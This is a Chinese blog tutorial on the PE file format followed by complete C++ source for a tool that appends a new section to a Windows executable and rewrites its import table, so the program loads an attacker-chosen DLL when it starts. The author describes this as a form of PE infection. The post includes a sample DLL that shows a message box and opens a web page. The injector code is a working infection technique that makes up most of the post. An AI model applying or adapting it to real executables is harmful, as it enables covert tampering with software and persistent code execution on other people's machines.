劫持 PE 文件:新建节表并插入指定 DLL 文件

发布时间:2023年12月31日

?PE格式简介

????????PE(Portable Executable)格式,是微软Win32环境可移植可执行文件(如exe、dll、vxd、sys和vdm等)的标准文件格式。PE格式衍生于早期建立在VAX(R)VMS(R)上的COFF(Common Object File Format)文件格式。

????????Portable 是指对于不同的Windows版本和不同的CPU类型上PE文件的格式是一样的,当然CPU不一样了,CPU指令的二进制编码是不一样的。只是文件中各种东西的布局是一样的。

????????PE文件使用的是一个平面地址空间,所有代码和数据都合并在一起,组成一个很大的结构。主要有:

下面是一个简化的PE文件格式

简化PE文件格式

DOS MZ Header

PE Header

Section Table

Section 1

Section 2

...

Section n

Dos Mz head 和Dos stub和称Dos文件头,PE文件的第一个字节起始于MS-DOS头部,被称作IMAGE_DOS_HEADER.紧随Dos stub的是PE文件头(PE Header),PE Header是PE相关结构NT映像头(IMAGE_NT_HEADERS)的简称,其中包含许多PE装载器用到的重要字段。

1、入口点 Entry Point

2、文件偏移地址?File Offset

3、虚拟地址?Virtual Address 简称:VA

4、基地址 ImageBase

5、相对虚拟地址?Relative Virual Address 简称:RVA

公式: RVA (相对虚拟地址) =VA (虚拟地址) - ImageBase (基地址)

文件偏移地址和虚拟地址转换

在X86系统中,每个内存页的大小是4KB,即0X1000个字节。

文件偏移地址 File Offset = RVA (相对虚拟地址)?

文件偏移地址 File Offset = VA (虚拟地址) - ImageBase (基地址)?

  • PE具体结构图

pe格式的结构体定义可以在编译器的include文件夹里的winnt.h找到。

如下所示(经过简化的,具体的可以查看winnt.h,不同字长的结构,其实大体一样的)。

几个宏定义:

IMAGE_DOS_HEADER

typedef struct _IMAGE_DOS_HEADER

{

WORD e_magic; //魔术数字,所有MS-DOS兼容的可执行文件都将此值设为0X4D5A(MZ)

WORD e_cblp; //文件最后页的字节数

WORD e_cp; //文件页数

WORD e_crlc; //重定义元素个数

WORD e_cparhdr; //头部尺寸,以段落为单位

WORD e_minalloc; //所需的最小附加段

WORD e_maxalloc; //所需的最大附加段

WORD e_ss; //初始的SS值(相对偏移量)

WORD e_sp; //初始的SP值

WORD e_csum; //校验和

WORD e_ip; //初始的IP值

WORD e_cs; //初始的CS值(相对偏移量)

WORD e_lfarlc; //重分配表文件地址

WORD e_ovno; //覆盖号

WORD e_res[4]; //保留字

WORD e_oemid; //OEM标识符(相对e_oeminfo)

WORD e_oeminfo; //OEM信息

WORD e_res2[10]; //保留字

DWORD e_lfanew; //新exe头部的文件地址

}IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

IMAGE_NT_HEADERS

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16

typedef struct IMAGE_NT_HEADERS

{

DWORD Signature;

IMAGE_FILE_HEADER FileHeader;

IMAGE_OPTIONAL_HEADER32 OptionalHeader;

}IMAGE_NT_HEADERS,*PIMAGE_NT_HEADERS;

typedef struct IMAGE_FILE_HEADER

{

WORD Machine;

WORD NumberOfSections;//节的数量

DWORD TimeDateStamp;

DWORD PointerToSymbols;

DWORD NumberOfSymbols;

WORD SizeOfOptionalHeader;

WORD Characteristics;

}IMAGE_FILE_HEADER,*PIMAGE_FILE_HEADER;

typedef struct IMAGE_OPTIONAL_HEADER32

{

WORD Magic;

BYTE MajorLinkerVersion;

BYTE MinorLinkerVersion;

DWORD SizeOfCode;

DWORD SizeOfInitializedData;

DWORD SizeOfUnInitializedData;

DWORD AddressOfEntryPoint;

DWORD BaseOfCode;

DWORD BaseOfData;

DWORD ImgaeBase;

DWORD SectionAlignment;

DWORD FileAlignment;

WORD MajorOperatingSystemVersion;

WORD MinorOperatingsystemversion;

WORD MajorImageVersion;

WORD MinorImageVersion;

WORD MajorSubsybtemVersion;

WORD MinorSubsybtemVersion;

DWORD Win32VersionValue;

DWORD SizeOfImage;

DWORD SizeoOfHeaders;

DWORD CheckSum;

WORD Subsystem;

WORD DllCharacteristics;

DWORD SizeOfStackReserve;

DWORD SizeOfStackCommit;

DWORD SizeOfHeapReserve;

DWORD SizeOfHeapCommit;

DWORD LoaderFlages;

DWORD NumberOfRvaAndSizes;

IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];

}IMAGE_OPTIONAL_HEADER32,*PIMAGE_OPTIONAL_HEADER32;

IMAGE_SECTION_HEADER

PE文件头后是节表,在winnt.h下如下定义

typedef struct _IMAGE_SECTION_HEADER

{

//IMAGE_SIZEOF_SHORT_NAME=8

BYTE Name[IMAGE_SIZEOF_SHORT_NAME];//节表名称,如".text"

union

{

DWORD PhysicalAddress;//物理地址

DWORD VirtualSize;//真实长度,这两个值是一个联合结构,可以使用其中的任何一个,//一般是节的数据大小

} Misc;

DWORD VirtualAddress;//RVA

DWORD SizeOfRawData;//物理长度

DWORD PointerToRawData;//节基于文件的偏移量

DWORD PointerToRelocations;//重定位的偏移

DWORD PointerToLinenumbers;//行号表的偏移

WORD NumberOfRelocations;//重定位项数目

WORD NumberOfLinenumbers;//行号表的数目

DWORD Characteristics;//节属性 如可读,可写,可执行等

} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
typedef struct IMAGE_THUNK_DATA

{

union

{

DWORD ForwarderString;

DWORD Function;

DWORD Ordinal;

DWORD AddressOfData;

}u1;

}IMAGE_THUNK_DATA,*PIMAGE_THUNK_DATA;

typedef struct IMAGE_IMPORT_BY_NAME

{

WORD Hint;

BYTE Name;

}IMAGE_IMPORT_BY_NAME;

详细PE结构说明请查阅:

PE文件结构详解 --(完整版)icon-default.png?t=N7T8https://hupengcheng.blog.csdn.net/article/details/125847139?spm=1001.2101.3001.6650.5&utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-5-125847139-blog-92456577.235%5Ev40%5Epc_relevant_anti_t3_base&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-5-125847139-blog-92456577.235%5Ev40%5Epc_relevant_anti_t3_base&utm_relevant_index=10

?

  • 修改 PE 文件 IAT 注入

? ? ? ? 通过以上的简单了解后,那么我们便进入正题。

? ? ? ? 下面演示的这种方法其实是 PE 感染的一种,通过对目标程序添加一个新节并注入DLL,然后这会改变 PE 文件的大小,将原有的导入表复制到新节中,并添加自己的导入表描述符,最后将数据目录项中指向的导入表的入口指向新节。

????????1、在目标 PE 文件中添加一个新节并映射 PE 文件,判断是否可以加一个新节,找到节的尾部,矫正偏移,对齐 RVA 填充新节 PIMAGE_SECTION_HEADER,修改IMAGE_NT_HEADERS,将新节添加到文件尾部。

? ? ? ? 2、修改导入表:判断是否使用了绑定导入表,往新节中拷贝原导入表内容,继续构造新的导入表描述符 PIMAGE_IMPORT_DESCRIPTOR,构造IAT结构体 PIMAGE_THUNK_DATA,填充 PIMAGE_THUNK_DATA,将 PIMAGE_IMPORT_DESCRIPTOR 的 OriginalFirstThunk 和 FirstThunk 指向 PIMAGE_THUNK_DATA,name 指向 DllName,最后修改导入表的 VirtualAddress 指向新节。

IDT 结构:

?

????????IDT 的描述在 IMAGE_OPTION_HEADER 里面的 IMPORT Table,通过 size 可以确定是否有足够的空间让我们添加。

????????IDT 是由 IMAGE_IMPORT_DESCRIPTION (简称IID) 结构体组成的数组,数组末尾以NULL结构体结束。每个IID结构体为0x14字节所以这里IID区域为RVA。

废话不多……直接上代码。?

  • 现实代码?

?DLL:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"

extern "C"
{
	__declspec(dllexport) int Msg();
}

__declspec(dllexport) int Msg()
{
	system("start https://www.chwm.vip/?PEinject_v1.0");
	return 0;
}

DWORD WINAPI Thread(LPVOID LpParameter)
{
	char szPath[MAX_PATH] = { 0 };
	char szBuf[1024] = { 0 };
	GetModuleFileName(NULL, szPath, MAX_PATH);
	sprintf(szBuf, "DLL 已注入到进程\r\n%s\r\nProcessID\r\n%d\r\n", szPath, GetCurrentProcessId());
	MessageBox(NULL, szBuf, "DLL Inject", MB_OK);
	return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		CreateThread(NULL, 0, Thread, NULL, 0, NULL);
        Msg();
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

主程序:

// PEinject.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "PEinject.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#endif

#define ERROR_MESSAGE(Msg) cout << Msg << endl;

 
// 唯一的应用程序对象

CWinApp theApp;

using namespace std;

 

BOOL    AddImportTable(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName);
BOOL    AddNewSection(const string& strTargetFile, ULONG ulNewSectionSize);
BOOL    AddNewImportDescriptor(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName);
DWORD   RVAToFOA(PIMAGE_NT_HEADERS pNtHeaders, DWORD dwRVA);
ULONG32 PEAlign(ULONG32 dwNumber, ULONG32 dwAlign);

 

BOOL AddImportTable(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName)
{
	BOOL bOk = false;
	try
	{
		bOk = AddNewSection(strTargetFile, 256);
		if (!bOk)
		{
			ERROR_MESSAGE("AddImportTable:AddNewSection failed.");
			return false;
		}

		bOk = AddNewImportDescriptor(strTargetFile, strInjectDllName, strFunctionName);
		if (!bOk)
		{
			ERROR_MESSAGE("AddImportTable:AddNewImportDescriptor failed.");
			return false;
		}
	}
	catch (exception* e)
	{
		ERROR_MESSAGE((string("AddImportTable:") + e->what()).c_str());
		return false;
	}

	return true;
}

BOOL AddNewSection(const string& strTargetFile, ULONG ulNewSectionSize)
{
	BOOL bOk = true;
	HANDLE TargetFileHandle = nullptr;
	HANDLE MappingHandle = nullptr;
	PVOID FileData = nullptr;

	try
	{
		// 打开文件
		TargetFileHandle = CreateFileA(strTargetFile.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		if (TargetFileHandle == INVALID_HANDLE_VALUE)
		{
			ERROR_MESSAGE(string("AddNewSection:CreateFileA error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		ULONG ulFileSize = GetFileSize(TargetFileHandle, NULL);

		// 映射文件
		MappingHandle = CreateFileMappingA(TargetFileHandle, NULL, PAGE_READWRITE, 0, ulFileSize, NULL);
		if (MappingHandle == NULL)
		{
			ERROR_MESSAGE(string("AddNewSection:CreateFileMapping error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		// 得到缓存头
		FileData = MapViewOfFile(MappingHandle, FILE_MAP_ALL_ACCESS, 0, 0, ulFileSize);
		if (FileData == NULL)
		{
			ERROR_MESSAGE(string("AddNewSection:MapViewOfFile error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		// 判断是否是PE文件
		if (((PIMAGE_DOS_HEADER)FileData)->e_magic != IMAGE_DOS_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewSection:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)FileData + ((PIMAGE_DOS_HEADER)FileData)->e_lfanew);
		if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewSection:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		// 判断是否可以增加一个新节
		if ((pNtHeaders->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) > pNtHeaders->OptionalHeader.SizeOfHeaders/*三个部分的总大小*/)
		{
			ERROR_MESSAGE("AddNewSection:There is not enough space to add a new section.");
			bOk = false;
			goto EXIT;
		}

		// 得到新节的起始地址, 最后的起始地址
		PIMAGE_SECTION_HEADER pNewSectionHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1) + pNtHeaders->FileHeader.NumberOfSections;
		PIMAGE_SECTION_HEADER pLastSectionHeader = pNewSectionHeader - 1;

		// 对齐RVA和偏移
		DWORD FileSize = PEAlign(ulNewSectionSize, pNtHeaders->OptionalHeader.FileAlignment);
		DWORD FileOffset = PEAlign(pLastSectionHeader->PointerToRawData + pLastSectionHeader->SizeOfRawData, pNtHeaders->OptionalHeader.FileAlignment);
		DWORD VirtualSize = PEAlign(ulNewSectionSize, pNtHeaders->OptionalHeader.SectionAlignment);
		DWORD VirtualOffset = PEAlign(pLastSectionHeader->VirtualAddress + pLastSectionHeader->Misc.VirtualSize, pNtHeaders->OptionalHeader.SectionAlignment);

		// 填充新节表
		memcpy(pNewSectionHeader->Name, "00cfg", strlen("00cfg"));
		pNewSectionHeader->VirtualAddress = VirtualOffset;
		pNewSectionHeader->Misc.VirtualSize = VirtualSize;
		pNewSectionHeader->PointerToRawData = FileOffset;
		pNewSectionHeader->SizeOfRawData = FileSize;
		pNewSectionHeader->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE;

		// 修改IMAGE_NT_HEADERS
		pNtHeaders->FileHeader.NumberOfSections++;
		pNtHeaders->OptionalHeader.SizeOfImage += VirtualSize;
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;            // 关闭绑定导入
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;

		// 添加新节到文件尾部
		SetFilePointer(TargetFileHandle, 0, 0, FILE_END);
		PCHAR pNewSectionContent = new CHAR[FileSize];
		RtlZeroMemory(pNewSectionContent, FileSize);
		DWORD dwWrittenLength = 0;
		bOk = WriteFile(TargetFileHandle, pNewSectionContent, FileSize, &dwWrittenLength, nullptr);
		if (bOk == false)
		{
			ERROR_MESSAGE(string("AddNewSection:WriteFile error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}
	}
	catch (exception* e)
	{
		ERROR_MESSAGE((string("AddNewSection:") + e->what()).c_str());
		bOk = false;
	}
EXIT:
	if (TargetFileHandle != NULL)
	{
		CloseHandle(TargetFileHandle);
		TargetFileHandle = nullptr;
	}
	if (FileData != NULL)
	{
		UnmapViewOfFile(FileData);
		FileData = nullptr;
	}
	if (MappingHandle != NULL)
	{
		CloseHandle(MappingHandle);
		MappingHandle = nullptr;
	}

	return bOk;
}

ULONG32 PEAlign(ULONG32 dwNumber, ULONG32 dwAlign)
{
	return(((dwNumber + dwAlign - 1) / dwAlign) * dwAlign);        //  想 dwAlign 对齐,加上 dwAlign - 1,这样就可以保证对齐后的值 >= dwNumber
}

BOOL AddNewImportDescriptor(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName)
{
	bool bOk = true;
	HANDLE TargetFileHandle = nullptr;
	HANDLE MappingHandle = nullptr;
	PVOID FileData = nullptr;
	PIMAGE_IMPORT_DESCRIPTOR pImportTable = nullptr;

	try
	{
		// 打开文件
		TargetFileHandle = CreateFileA(strTargetFile.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		if (TargetFileHandle == INVALID_HANDLE_VALUE)
		{
			ERROR_MESSAGE(string("AddNewImportDescriptor:CreateFileA error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		ULONG ulFileSize = GetFileSize(TargetFileHandle, NULL);

		// 映射文件
		MappingHandle = CreateFileMappingA(TargetFileHandle, NULL, PAGE_READWRITE, 0, ulFileSize, NULL);
		if (MappingHandle == NULL)
		{
			cout << "AddNewImportDescriptor:CreateFileMapping error with error code:" << std::to_string(GetLastError()).c_str();
			bOk = false;
			goto EXIT;
		}

		// 得到缓存头
		FileData = MapViewOfFile(MappingHandle, FILE_MAP_ALL_ACCESS, 0, 0, ulFileSize);
		if (FileData == NULL)
		{
			ERROR_MESSAGE(string("AddNewImportDescriptor:MapViewOfFile error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		// 判断是否是PE文件
		if (((PIMAGE_DOS_HEADER)FileData)->e_magic != IMAGE_DOS_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewImportDescriptor:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)FileData + ((PIMAGE_DOS_HEADER)FileData)->e_lfanew);
		if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewImportDescriptor:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		// 得到原导入表
		pImportTable = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG_PTR)FileData + RVAToFOA(pNtHeaders, pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));

		// 判断是否使用了绑定导入表
		bool bBoundImport = false;
		if (pImportTable->Characteristics == 0 && pImportTable->FirstThunk != 0)
		{
			// 桥一为0 桥二不是0 说明使用了绑定导入表
			bBoundImport = true;
			pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;    // 关闭绑定导入
			pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
		}

		// 找到自己添加的新节
		PIMAGE_SECTION_HEADER pNewSectionHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1) + pNtHeaders->FileHeader.NumberOfSections - 1;
		PBYTE pNewSectionData = pNewSectionHeader->PointerToRawData + (PBYTE)FileData;
		PBYTE pNewImportDescriptor = pNewSectionData;

		// 往新节中拷贝原导入表内容
		int i = 0;
		while (pImportTable->FirstThunk != 0 || pImportTable->Characteristics != 0)
		{
			memcpy(pNewSectionData + i * sizeof(IMAGE_IMPORT_DESCRIPTOR), pImportTable, sizeof(IMAGE_IMPORT_DESCRIPTOR));
			pImportTable++;
			pNewImportDescriptor += sizeof(IMAGE_IMPORT_DESCRIPTOR);
			i++;
		}

		// 复制最后一个描述符
		memcpy(pNewImportDescriptor, pNewImportDescriptor - sizeof(IMAGE_IMPORT_DESCRIPTOR), sizeof(IMAGE_IMPORT_DESCRIPTOR));

		// 计算修正值
		DWORD dwDelt = pNewSectionHeader->VirtualAddress - pNewSectionHeader->PointerToRawData;

		// pNewImportDescriptor 当前指向要构造的新描述符 再空出一个空描述符作为导入表的结束符 所以是 2 *
		PIMAGE_THUNK_DATA pNewThunkData = PIMAGE_THUNK_DATA(pNewImportDescriptor + 2 * sizeof(IMAGE_IMPORT_DESCRIPTOR));
		PBYTE pszDllName = (PBYTE)(pNewThunkData + 2);
		memcpy(pszDllName, strInjectDllName.c_str(), strInjectDllName.length());
		// 确定 DllName 的位置
		pszDllName[strInjectDllName.length() + 1] = 0;
		// 确定 IMAGE_IMPORT_BY_NAM 的位置
		PIMAGE_IMPORT_BY_NAME pImportByName = (PIMAGE_IMPORT_BY_NAME)(pszDllName + strInjectDllName.length() + 1);
		// 初始化 IMAGE_THUNK_DATA
		pNewThunkData->u1.Ordinal = (DWORD_PTR)pImportByName - (DWORD_PTR)FileData + /*加上修正值 - 这里应该填充在内存中的地址*/dwDelt;
		// 初始化 IMAGE_IMPORT_BY_NAME
		pImportByName->Hint = 1;
		memcpy(pImportByName->Name, strFunctionName.c_str(), strFunctionName.length());
		pImportByName->Name[strFunctionName.length() + 1] = 0;
		// 初始化 PIMAGE_IMPORT_DESCRIPTOR
		if (bBoundImport)
		{
			((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->OriginalFirstThunk = 0;
		}
		else
		{
			((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->OriginalFirstThunk = dwDelt + (DWORD_PTR)pNewThunkData - (DWORD_PTR)FileData;
		}
		((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->FirstThunk = dwDelt + (DWORD_PTR)pNewThunkData - (DWORD_PTR)FileData;
		((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->Name = dwDelt + (DWORD_PTR)pszDllName - (DWORD_PTR)FileData;
		// 修改导入表入口
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = pNewSectionHeader->VirtualAddress;
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size = (i + 1) * sizeof(IMAGE_IMPORT_DESCRIPTOR);
	}
	catch (exception* e)
	{
		ERROR_MESSAGE((string("AddNewImportDescriptor:") + e->what()).c_str());
		bOk = false;
	}

EXIT:
	{
		if (TargetFileHandle != NULL)
		{
			CloseHandle(TargetFileHandle);
			TargetFileHandle = nullptr;
		}

		if (FileData != NULL)
		{
			UnmapViewOfFile(FileData);
			FileData = nullptr;
		}

		if (MappingHandle != NULL)
		{
			CloseHandle(MappingHandle);
			MappingHandle = nullptr;
		}
	}

	return bOk;
}

PIMAGE_SECTION_HEADER GetOwnerSection(PIMAGE_NT_HEADERS pNTHeaders, DWORD dwRVA)
{
	int i;
	PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)(pNTHeaders + 1);
	for (i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++)
	{
		if ((dwRVA >= (pSectionHeader + i)->VirtualAddress) && (dwRVA <= ((pSectionHeader + i)->VirtualAddress + (pSectionHeader + i)->SizeOfRawData)))
		{
			return ((PIMAGE_SECTION_HEADER)(pSectionHeader + i));
		}
	}
	return PIMAGE_SECTION_HEADER(NULL);
}

DWORD RVAToFOA(PIMAGE_NT_HEADERS pNTHeaders, DWORD dwRVA)
{
	DWORD _offset;
	PIMAGE_SECTION_HEADER section;
	// 找到偏移所在节
	section = GetOwnerSection(pNTHeaders, dwRVA);
	if (section == NULL)
	{
		return(0);
	}
	// 修正偏移
	_offset = dwRVA + section->PointerToRawData - section->VirtualAddress;
	return(_offset);
}

int main(int argc, char *argv[])
{
	AddImportTable("Wmplayer.exe", "TestDLL.dll", "Msg");

    system("start https://www.chwm.vip/?PEinject_v1.0");

	system("pause");

	return 0;
}
  • 效果演示:

修改前

修改后

?

运行效果

文章来源:https://blog.csdn.net/qq_39190622/article/details/135277194
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